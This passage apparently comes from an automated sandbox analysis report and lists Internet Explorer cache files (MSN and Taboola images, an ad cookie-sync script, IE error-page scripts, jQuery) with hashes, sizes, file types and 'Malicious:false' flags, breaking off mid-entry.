                                                    Entropy (8bit):7.976658963029316
                                                    Encrypted:false
                                                    SSDEEP:1536:I8gnHE/pxbdT/TigcUjbF4wPZ1kjx/aZe56VpHs0n+mQb:XgH+7qwR1kjx/Ee4wn
                                                    MD5:D5C5E94DF2D4878C48E61B08ECB9EBA9
                                                    SHA1:00D8AB46B525F4EC4F5541BC3501CD785FBAA061
                                                    SHA-256:47CD85D032646272DE43ECA7932530B96F8D86433DCF627466BDBDD532F00F3B
                                                    SHA-512:1548E5CA19C1511039E6F0D09E6FAD0240E52FC8235A54ADF6673047E7193DD2044F90549DFFE2AA72805D88889C0C38E760E024CD9AAA18B3945219338C1A5B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMteHi.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMtnFL[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 310x166, frames 3
                                                    Category:downloaded
                                                    Size (bytes):15550
                                                    Entropy (8bit):7.954428899881503
                                                    Encrypted:false
                                                    SSDEEP:384:0V1FhrB9a2h90oZUuoFJQi9W/2kfZQ6MM1rMArw5rK+SrFCN:0V1/rB9a40/jFT56MgslK+SK
                                                    MD5:BE52F26CEB2706FB5130F49E580A3353
                                                    SHA1:BB3CD3B0DFE5B072FF8B198A45F568631CE60830
                                                    SHA-256:7F690A82B233387590E5A0E22CB3173BCA971287245EFC8BFCD07A3A83CF407D
                                                    SHA-512:262F4EE4E4D616073BD220D7B0C35E569FB90DEF7A24B46F6DD2F805FA8C116FFDC75D9840C14F7FD11CA56165340D8497C39F4AA80FB7521FDD8F1FF7F40D88
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMtnFL.img?h=166&w=310&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMu5Qi[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 100x75, frames 3
                                                    Category:downloaded
                                                    Size (bytes):3496
                                                    Entropy (8bit):7.8779252211609
                                                    Encrypted:false
                                                    SSDEEP:48:QfAuETAgXHSmCf8HqFQgHQD94l0Yr0aIKDWakHJkjwRshkFJXUhxA+nBbWlfeNrG:Qf7ENCfpQD9bjKP0Jk8ShkfU0kMfekT3
                                                    MD5:FA98D470B926B5FAA06AE3A1D9DC416E
                                                    SHA1:3127CDC234451F390A0A4E2FD476299D9EE880B4
                                                    SHA-256:1DAEDD97862D40B052F686CE4C6D685D58AA1D70A1853C3A0632F081E3D040B5
                                                    SHA-512:3B3D0D2E4024FEABE2ACDAB878D52D9E81FF80796380C78E6EAE1EBD6034D80FC541CCF7D2C88DF0B26E500C19C801468BC313A749EC499D89D8B469070A4579
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMu5Qi.img?h=75&w=100&m=6&q=60&u=t&o=t&l=f&f=jpg&x=1708&y=1239
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\AAMunDy[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 311x333, frames 3
                                                    Category:downloaded
                                                    Size (bytes):31835
                                                    Entropy (8bit):7.970466533191044
                                                    Encrypted:false
                                                    SSDEEP:768:Nad++g8k1HVo7Df5Dyze6IfVU91ZeTTU26IkUOyC7oIDdSc+z:NQ+X8k1Hcf5NKuHgXyCg
                                                    MD5:3E435A2F9D8B66231871BB6C73D3574C
                                                    SHA1:096164641A7CC8ADF894613DCC213A7A59BE63F1
                                                    SHA-256:37AC9E43061708A693AE08938324937B08A954ACE67F2C3BE90DC8EBBC34F022
                                                    SHA-512:294EEAD9BD01BE43CAE98C57F09916964B7C462FDE46F5CB21C4B70F31C83BAFB86E2D6851E24299052C0886C5DFB6E8793D78DCBD2F85EC2F1F41995D7100D5
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/AAMunDy.img?h=333&w=311&m=6&q=60&u=t&o=t&l=f&f=jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB116fUs[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):458
                                                    Entropy (8bit):7.210742812446173
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7XBvDtGBGFqRb8EJYYkQfCtK3Ir3v98:UtDEBYqV8E7k6V+F8
                                                    MD5:2343404EAEB895F56B8EA1C57104CC46
                                                    SHA1:C3A894822DEB625BBEC44E58194DE48CDA7A133F
                                                    SHA-256:CCABAA94321280B2F25C0937FC67E13227150D42A81DBCDF073DBC1F8B0F41D9
                                                    SHA-512:8953413DE432A1DEC0E59A64316338FB699BAB2FFBB1FA63AD99CA1E131D4220C9005E446C8F2BAA737CE91174820258EFD95B0361D9EDBBCD4108F7E0909835
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB116fUs.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB15AQNm[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 622x368, frames 3
                                                    Category:downloaded
                                                    Size (bytes):29565
                                                    Entropy (8bit):7.9235998300887145
                                                    Encrypted:false
                                                    SSDEEP:384:I1cMsjB7+C2bbAEB2SUZRT+kXoMRRJhp5xvHapIzf7m41tgaYi9PIVKnHNVMP2Nm:IHsjkC2YEB2SUPTT48FPHTgf3VKn2Uc
                                                    MD5:6B79D1438D8EFAF3B8DE6163107CEC71
                                                    SHA1:E54E651A8A0FDAFCAD60B137D806D8CEC2F769C0
                                                    SHA-256:2F00C9B0C23EE995091A90ACC7A8FA3AA773612A464F558D78664636C8B7B8D8
                                                    SHA-512:745B822F9E21DB98B909F3AE762C439C376A35AD5C08655861B05539ACD5C47BCDCF24FAB2FB5A56712BC3BEDE6493FD5152E92D065AC5E9ECCE2DF93C4B78B7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB15AQNm.img?h=368&w=622&m=6&q=60&u=t&o=t&l=f&f=jpg&x=868&y=379
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1cG73h[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 27 x 27, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):1131
                                                    Entropy (8bit):7.767634475904567
                                                    Encrypted:false
                                                    SSDEEP:24:lGH0pUewXx5mbpLxMkes8rZDN+HFlCwUntvB:JCY9xr4rZDEFC
                                                    MD5:D1495662336B0F1575134D32AF5D670A
                                                    SHA1:EF841C80BB68056D4EF872C3815B33F147CA31A8
                                                    SHA-256:8AD6ADB61B38AFF497F2EEB25D22DB30F25DE67D97A61DC6B050BB40A09ACD76
                                                    SHA-512:964EE15CDC096A75B03F04E532F3AA5DCBCB622DE5E4B7E765FB4DE58FF93F12C1B49A647DA945B38A647233256F90FB71E699F65EE289C8B5857A73A7E6AAC6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1cG73h.img?h=27&w=27&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB1kvzy[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 30 x 30, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):1100
                                                    Entropy (8bit):7.749452105424938
                                                    Encrypted:false
                                                    SSDEEP:12:6v/7eZ3IqhrinW+y2UXaxTaJgfcoG7QKJ7OZfhL3cp1pW2krS7BiArfss7P7UIQb:jVT2aCTjG8MOZR372/7iU7UIylHdLN
                                                    MD5:C6E13630360E0B6D880AFDF3CD2A2204
                                                    SHA1:63DCA80F76834F5A3FBE79F661678375239F72A4
                                                    SHA-256:49767874BCF0F0648266F3018B5CCE3CA539B85778E5395D1212ACB114287D65
                                                    SHA-512:CB8F7629DA131226146B12119C06A846A2EC9E9D069711711AC50CD7F31E321144E39270E82EA693E2FE9BFD1634841BF450173807AB6607794E2AF0EBE832C8
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB1kvzy.img?m=6&o=true&u=true&n=true&w=30&h=30
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\BB7gRE[1].png
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced
                                                    Category:downloaded
                                                    Size (bytes):501
                                                    Entropy (8bit):7.3374462687222906
                                                    Encrypted:false
                                                    SSDEEP:12:6v/71zYhg8gNX8GA3PhV8xJy4eOsEfOZbLjz:u8O9A/hSJ9lfkbb
                                                    MD5:1FCA95AEED29D3219D0A53A78A041312
                                                    SHA1:5A4661CCF1E9F6581F71FC429E599D81B8895297
                                                    SHA-256:4B0F37A05AB882DA679792D483B105FDD820639C390FC7636676424ECFD418B9
                                                    SHA-512:7E02CEB4A6F91B2D718712E37255F54DA180FA83008E0CE37080DADFE8B4D0D50BC0EA8657B87003D9BAD10FA5581DBB8C1C64D267B6C435DA48CBED3366CDEA
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/img-resizer/tenant/amp/entityid/BB7gRE.img?h=16&w=16&m=6&q=60&u=t&o=t&l=f&f=png
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\a8a064[1].gif
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:GIF image data, version 89a, 28 x 28
                                                    Category:downloaded
                                                    Size (bytes):16360
                                                    Entropy (8bit):7.019403238999426
                                                    Encrypted:false
                                                    SSDEEP:384:g2SEiHys4AeP/6ygbkUZp72i+ccys4AeP/6ygbkUZaoGBm:g2Tjs4Ae36kOpqi+c/s4Ae36kOaoGm
                                                    MD5:3CC1C4952C8DC47B76BE62DC076CE3EB
                                                    SHA1:65F5CE29BBC6E0C07C6FEC9B96884E38A14A5979
                                                    SHA-256:10E48837F429E208A5714D7290A44CD704DD08BF4690F1ABA93C318A30C802D9
                                                    SHA-512:5CC1E6F9DACA9CEAB56BD2ECEEB7A523272A664FE8EE4BB0ADA5AF983BA98DBA8ECF3848390DF65DA929A954AC211FF87CE4DBFDC11F5DF0C6E3FEA8A5740EF7
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/64/a8a064.gif
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\checksync[1].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\checksync[2].htm
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, ASCII text, with very long lines
                                                    Category:dropped
                                                    Size (bytes):21552
                                                    Entropy (8bit):5.3052221077615584
                                                    Encrypted:false
                                                    SSDEEP:384:gIAGcVXlblcqnzleZSweg2f5ng+7naMHF3OZOHQWwY4RXrqt:R86qhbS2RpF3OsHQWwY4RXrqt
                                                    MD5:D0E1F91215881E5FA53C3B18262A9DFE
                                                    SHA1:B8C86EC6E6E94F5104E9A60DD286BC2E9F50C3BE
                                                    SHA-256:26A91F854D0E89589A8018D507B38F21CD27094E38F1894F215AEF20144D618B
                                                    SHA-512:01F394424DDA7F38B8978643C452B784144103D6E36C001B8B0DB70926C0577F75FBB5EE0EE7235B8582CDBFC3117E2ECFA8AF8A4DCCB72B1BE9FD6D4E040B0B
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: <html> <head></head> <body> <script type="text/javascript">try{.var cookieSyncConfig = {"datalen":77,"visitor":{"vsCk":"visitor-id","vsDaCk":"data","sepVal":"|","sepTime":"*","sepCs":"~~","vsDaTime":31536000,"cc":"CH","zone":"d"},"cs":"1","lookup":{"g":{"name":"g","cookie":"data-g","isBl":1,"g":1,"cocs":0},"vzn":{"name":"vzn","cookie":"data-v","isBl":1,"g":0,"cocs":0},"brx":{"name":"brx","cookie":"data-br","isBl":1,"g":0,"cocs":0},"lr":{"name":"lr","cookie":"data-lr","isBl":1,"g":1,"cocs":0}},"ussyncmap":[],"hasSameSiteSupport":"0","batch":{"gGroups":["apx","csm","ppt","rbcn","son","bdt","con","opx","tlx","mma","c1x","ys","sov","fb","r1","g","pb","dxu","rkt","trx","wds","crt","ayl","bs","ui","shr","lvr","yld","msn","zem","dmx","pm","som","adb","tdd","soc","adp","vm","spx","nat","ob","adt","got","mf","emx","sy","lr","ttd"],"bSize":2,"time":30000,"ngGroups":[]},"log":{"successLper":10,"failLper":10,"logUrl":{"cl":"https:\/\/hblg.media.net\/log?logid=kfk&evtid=chlog"}},"csloggerUrl":"http
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\dnserror[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:HTML document, UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):2997
                                                    Entropy (8bit):4.4885437940628465
                                                    Encrypted:false
                                                    SSDEEP:48:u7u5V4VyhhV2lFUW29vj0RkpNc7KpAP8Rra:vIlJ6G7Ao8Ra
                                                    MD5:2DC61EB461DA1436F5D22BCE51425660
                                                    SHA1:E1B79BCAB0F073868079D807FAEC669596DC46C1
                                                    SHA-256:ACDEB4966289B6CE46ECC879531F85E9C6F94B718AAB521D38E2E00F7F7F7993
                                                    SHA-512:A88BECB4FBDDC5AFC55E4DC0135AF714A3EEC4A63810AE5A989F2CECB824A686165D3CEDB8CBD8F35C7E5B9F4136C29DEA32736AABB451FE8088B978B493AC6D
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/dnserror.htm?ErrorStatus=0x800C0008
                                                    Preview: .<!DOCTYPE HTML>..<html>.. <head>.. <link rel="stylesheet" type="text/css" href="NewErrorPageTemplate.css" >.. <meta http-equiv="Content-Type" content="text/html; charset=UTF-8">.. <title>Can&rsquo;t reach this page</title>.. <script src="errorPageStrings.js" language="javascript" type="text/javascript">.. </script>.. <script src="httpErrorPagesScripts.js" language="javascript" type="text/javascript">.. </script>.. </head>.... <body onLoad="getInfo(); initMoreInfo('infoBlockID');">.. <div id="contentContainer" class="mainContent">.. <div id="mainTitle" class="title">Can&rsquo;t reach this page</div>.. <div class="taskSection" id="taskSection">.. <ul id="cantDisplayTasks" class="tasks">.. <li id="task1-1">Make sure the web address <span id="webpage" class="webpageURL"></span>is correct</li>.. <li id="task1-2">Search for this site on Bing</li>..
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\e151e5[1].gif
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:GIF image data, version 89a, 1 x 1
                                                    Category:downloaded
                                                    Size (bytes):43
                                                    Entropy (8bit):3.122191481864228
                                                    Encrypted:false
                                                    SSDEEP:3:CUTxls/1h/:7lU/
                                                    MD5:F8614595FBA50D96389708A4135776E4
                                                    SHA1:D456164972B508172CEE9D1CC06D1EA35CA15C21
                                                    SHA-256:7122DE322879A654121EA250AEAC94BD9993F914909F786C98988ADBD0A25D5D
                                                    SHA-512:299A7712B27C726C681E42A8246F8116205133DBE15D549F8419049DF3FCFDAB143E9A29212A2615F73E31A1EF34D1F6CE0EC093ECEAD037083FA40A075819D2
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://static-global-s-msn-com.akamaized.net/hp-neu/sc/9b/e151e5.gif
                                                    Preview: GIF89a.............!.......,...........D..;
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\errorPageStrings[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):4720
                                                    Entropy (8bit):5.164796203267696
                                                    Encrypted:false
                                                    SSDEEP:96:z9UUiqRxqH211CUIRgRLnRynjZbRXkRPRk6C87Apsat/5/+mhPcF+5g+mOQb7A9o:JsUOG1yNlX6ZzWpHOWLia16Cb7bk
                                                    MD5:D65EC06F21C379C87040B83CC1ABAC6B
                                                    SHA1:208D0A0BB775661758394BE7E4AFB18357E46C8B
                                                    SHA-256:A1270E90CEA31B46432EC44731BF4400D22B38EB2855326BF934FE8F1B169A4F
                                                    SHA-512:8A166D26B49A5D95AEA49BC649E5EA58786A2191F4D2ADAC6F5FBB7523940CE4482D6A2502AA870A931224F215CB2010A8C9B99A2C1820150E4D365CAB28299E
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:res://ieframe.dll/errorPageStrings.js
                                                    Preview: .//Split out for localization...var L_GOBACK_TEXT = "Go back to the previous page.";..var L_REFRESH_TEXT = "Refresh the page.";..var L_MOREINFO_TEXT = "More information";..var L_OFFLINE_USERS_TEXT = "For offline users";..var L_RELOAD_TEXT = "Retype the address.";..var L_HIDE_HOTKEYS_TEXT = "Hide tab shortcuts";..var L_SHOW_HOTKEYS_TEXT = "Show more tab shortcuts";..var L_CONNECTION_OFF_TEXT = "You are not connected to the Internet. Check your Internet connection.";..var L_CONNECTION_ON_TEXT = "It appears you are connected to the Internet, but you might want to try to reconnect to the Internet.";....//used by invalidcert.js and hstscerterror.js..var L_CertUnknownCA_TEXT = "Your PC doesn\u2019t trust this website\u2019s security certificate.";..var L_CertExpired_TEXT = "The website\u2019s security certificate is not yet valid or has expired.";..var L_CertCNMismatch_TEXT = "The hostname in the website\u2019s security certificate differs from the website you are trying to visit.";..var L
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\httpErrorPagesScripts[1]
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
                                                    Category:dropped
                                                    Size (bytes):12105
                                                    Entropy (8bit):5.451485481468043
                                                    Encrypted:false
                                                    SSDEEP:192:x20iniOciwd1BtvjrG8tAGGGVWnvyJVUrUiki3ayimi5ezLCvJG1gwm3z:xPini/i+1Btvjy815ZVUwiki3ayimi5f
                                                    MD5:9234071287E637F85D721463C488704C
                                                    SHA1:CCA09B1E0FBA38BA29D3972ED8DCECEFDEF8C152
                                                    SHA-256:65CC039890C7CEB927CE40F6F199D74E49B8058C3F8A6E22E8F916AD90EA8649
                                                    SHA-512:87D691987E7A2F69AD8605F35F94241AB7E68AD4F55AD384F1F0D40DC59FFD1432C758123661EE39443D624C881B01DCD228A67AFB8700FE5E66FC794A6C0384
                                                    Malicious:false
                                                    Reputation:unknown
                                                    Preview: ...function isExternalUrlSafeForNavigation(urlStr)..{..var regEx = new RegExp("^(http(s?)|ftp|file)://", "i");..return regEx.exec(urlStr);..}..function clickRefresh()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..window.location.replace(location.substring(poundIndex+1));..}..}..function navCancelInit()..{..var location = window.location.href;..var poundIndex = location.indexOf('#');..if (poundIndex != -1 && poundIndex+1 < location.length && isExternalUrlSafeForNavigation(location.substring(poundIndex+1)))..{..var bElement = document.createElement("A");..bElement.innerText = L_REFRESH_TEXT;..bElement.href = 'javascript:clickRefresh()';..navCancelContainer.appendChild(bElement);..}..else..{..var textNode = document.createTextNode(L_RELOAD_TEXT);..navCancelContainer.appendChild(textNode);..}..}..function getDisplayValue(elem
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_473ae3d59c5a5d6ebb789fc52267b3de[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):13854
                                                    Entropy (8bit):7.960413420462163
                                                    Encrypted:false
                                                    SSDEEP:384:pHKVu8MqBqVecPM4ZsOTOsKf1T/DT5+RPcHZ5EiT:pHVneBShTODZ/DT5+MZ5nT
                                                    MD5:F9540C95FB896862FF39C70D74C8C815
                                                    SHA1:62BB66850D1B207C7519763E0C05608C258CD33B
                                                    SHA-256:9270B2255FABED04B45DEFD4E54E07E242AB0737A3C3A351B0780C9003920C04
                                                    SHA-512:BD13E2B6F9783F036D598472555A52F7D57064DC8531CF9638265B80FA93274712B57FC9C4F572EA9439E374D457D6AD7E2241BD0E65BA1AAF5CDFFFB7AA94C6
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ce_sharpen%2Ch_311%2Cw_207%2Cc_fill%2Cg_xy_center%2Cx_1548%2Cy_2688/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F473ae3d59c5a5d6ebb789fc52267b3de.jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_705322f466ee4e70b10d73d39074748e[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):5327
                                                    Entropy (8bit):7.897539434889785
                                                    Encrypted:false
                                                    SSDEEP:96:ZvXg3lDeKX7cq6/VLIu6c7dt/aI3IKuH6CLcA6c6zkFoSt:ZvQ3Jcbmu6cSI3IKuHAc6mV
                                                    MD5:BAAA7E036D2C2AA17EA230A3CF709974
                                                    SHA1:55D26D8847212159A01C47CB11A71367ED498671
                                                    SHA-256:92DAA66C6F1FB1F4D59DAC2797ACC31CC45299990F3E5AA591A2B2C22BEDB5DF
                                                    SHA-512:BB9C186BCAAB1954C146E2DDBDC7B8539699465E2062223F8934C971691F5BB4BBE9944A07B22A290D9CF028BEDA49CDFA4B43B0C45206466DA272F79BEBA710
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2F705322f466ee4e70b10d73d39074748e.jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_GETTY_IMAGES_SKP_1024817754__XfRtGeKb[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
                                                    Category:downloaded
                                                    Size (bytes):17316
                                                    Entropy (8bit):7.910298786011498
                                                    Encrypted:false
                                                    SSDEEP:384:KGcOOO2n80PP9bG2Io+Ry3dL3NhKpPKhUQYURjpQK0s:KuiNCbRIdrrAihYway
                                                    MD5:F76CBF59F82973371C2CE7DD15ED4589
                                                    SHA1:328604D9E59280824F0F1C974D7A5A7C6C850A2B
                                                    SHA-256:2356B173163DAB414255F656C2270B45297C49FE8A989815DB6D64B3F02E7D6B
                                                    SHA-512:7C243F60A999CAAB107D0DEC2F00DBA1E30FE3A0D3A77835A78FD6377B539A42A9775574AD276774518CB5E099F01B3B5752E8B459AB7F56E44408F77478B58F
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2FGETTY_IMAGES%2FSKP%2F1024817754__XfRtGeKb.jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\http___cdn.taboola.com_libtrc_static_thumbnails_c98d021d67b7e64fe29e539f62f002ad[1].jpg
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 1
                                                    Category:downloaded
                                                    Size (bytes):9577
                                                    Entropy (8bit):7.9516292979757
                                                    Encrypted:false
                                                    SSDEEP:192:4KTuL27HrlustoJhKL/Se0hpxZJKFbQ5pfHhq9poBoYYgCt+9:rP7HrYstoJu/q5oYYLS
                                                    MD5:DD6FC4F19195A0931A12CDD9B0BFBFEA
                                                    SHA1:BE6DAA794824E465BE9327BF9C08038D7B664255
                                                    SHA-256:CB0E5D530D921AB4DB1D4F5C2C50DA232478A36692F7DC87C116CA1D0B8481FB
                                                    SHA-512:6F733CFCE90217D6312AA332DDB9F1AC3E981DAFCBC3B0E0A0679504CD9419AD624CF837B089B750A7FCC1876A6A0CA225C403C87319BC0392E1CE237D358DAF
                                                    Malicious:false
                                                    Reputation:unknown
                                                    IE Cache URL:https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/http%3A%2F%2Fcdn.taboola.com%2Flibtrc%2Fstatic%2Fthumbnails%2Fc98d021d67b7e64fe29e539f62f002ad.jpg
                                                    C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\0W10PBUV\jquery-2.1.1.min[1].js
                                                    Process:C:\Program Files (x86)\Internet Explorer\iexplore.exe
                                                    File Type:ASCII text, with very long lines, with CRLF line terminators
                                                    Category:downloaded
                                                    Size (bytes):84249
                                                    Entropy (8bit):5.369991369254365
                                                    Encrypted:false
                                                    SSDEEP:1536:DPEkjP+iADIOr/NEe876nmBu3HvF38NdTuJO1z6/A4TqAub0R4ULvguEhjzXpa9r:oNM2Jiz6oAFKP5a98HrY
                                                    MD5:9A094379D98C6458D480AD5A51C4AA27
